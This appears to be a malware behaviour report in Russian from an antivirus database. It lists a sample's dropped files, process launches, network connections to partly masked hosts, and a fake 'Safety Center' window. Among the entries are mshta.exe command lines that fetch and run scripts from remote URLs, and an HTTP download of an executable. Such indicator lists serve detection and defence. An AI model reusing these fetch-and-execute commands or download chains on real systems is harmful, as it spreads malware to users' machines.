Техническая информация
- '<Текущая директория>\temp.exe'
- '<Текущая директория>\temp.exe' (загружен из сети Интернет)
- '<SYSTEM32>\cmd.exe' /c ""<Текущая директория>\temp.bat" "
- '<SYSTEM32>\wscript.exe' "<Текущая директория>\temp.js"
- '<SYSTEM32>\mshta.exe' http://95.##1.27.154/install.php?id#################################
- '<SYSTEM32>\mshta.exe' http://ur###nam.net/8732489273.php
- <Текущая директория>\temp
- <Текущая директория>\temp
- 'ur###nam.net':80
- 'localhost':1042
- '22#.#3.218.83':80
- 'localhost':1037
- '95.##1.27.154':80
- 'localhost':1039
- http://22#.#3.218.83/u5.exe
- http://ur###nam.net/8732489273.php
- http://95.##1.27.154/install.php?id#################################
- DNS ASK ur###nam.net
- ClassName: 'TForm1' WindowName: 'Safety Center'
- ClassName: 'Shell_TrayWnd' WindowName: ''